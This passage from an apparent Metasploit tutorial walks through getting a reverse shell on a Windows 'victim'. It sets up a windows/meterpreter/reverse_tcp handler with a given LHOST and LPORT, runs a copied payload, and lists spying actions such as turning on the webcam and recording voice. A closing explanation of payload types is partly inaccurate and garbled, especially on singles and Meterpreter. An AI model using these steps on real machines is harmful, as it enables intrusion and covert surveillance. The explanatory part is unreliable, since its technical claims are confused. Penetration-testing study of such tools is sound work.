Executing the Payload
Step 1: Copy the payload file to the target windows machine.
Step 2: We must now configure a listener on the port specified in the executable. The screenshot below illustrates the instructions to be entered into Metasploit. First, we’ll use the command “use multi/handler” to instruct Metasploit to utilize the generic payload handler “multi/handler”. We will then use the command “set payload windows/meterpreter/reverse_tcp” to match the payload set within the executable. Then we’ll set the LHOST and LPORT as follows: “set LHOST 192.168.1.9” and “LPORT 4444”. After that, type “run” or “exploit” and hit Enter.
The reverse TCP handler should start looking for a connection.
Step 3: Execute the payload and check the connection on the Kali Machine.
As you can see, we have now established a connection with the victim machine.
Step 4: You can do pretty much anything on the target computer once your meterpreter session is established. Here are several examples:
- Open Webcam
- Record Voice
- Close Any Application
- Upload Or Download Any File To The Target Pc
- Shutdown Target Pc and much more
If you wish to get a list of Operations that can be performed on the target machine. Enter the help command.
Working with Payload Metasploit in Kali Linux
The Metasploit framework is a penetration testing tool for exploiting and validating vulnerabilities. It includes the fundamental architecture, particular content, and tools required for penetration testing and extensive security evaluation. It is a well-known exploitation framework that is routinely updated; new exploits are included as soon as they are announced. It includes a number of tools for constructing security workspaces for vulnerability and penetration testing systems.
There are several types of payloads in Metasploit. These three fundamental categories are the ones you’ll end up using the most.
- Singles: Singles are small and are used to start a dialogue before going on to the next step.
- Stagers: The payload uses the stager to create a network connection between the target machine and the payload processor on the Metasploit server. The stager enables you to load and insert a bigger, more complex payload known as the stage by utilizing a smaller payload.
- Meterpreter: Meterpreter has evolved into a Metasploit attack payload that provides an intruder factor that influences how the target system browses and executes programs. Meterpreter is a memory-only program that does not write to the hard drive. Meterpreter attempted to inject itself into the attacked process, from where it might migrate to other functioning methods; as a result, no new processes were established. Meterpreter was designed to avoid the drawbacks of employing specific payloads while allowing command writing and ensuring encrypted connection. The disadvantage of using particular payloads is that if a newer process begins throughout the target system, alarms may be generated.
Contact Us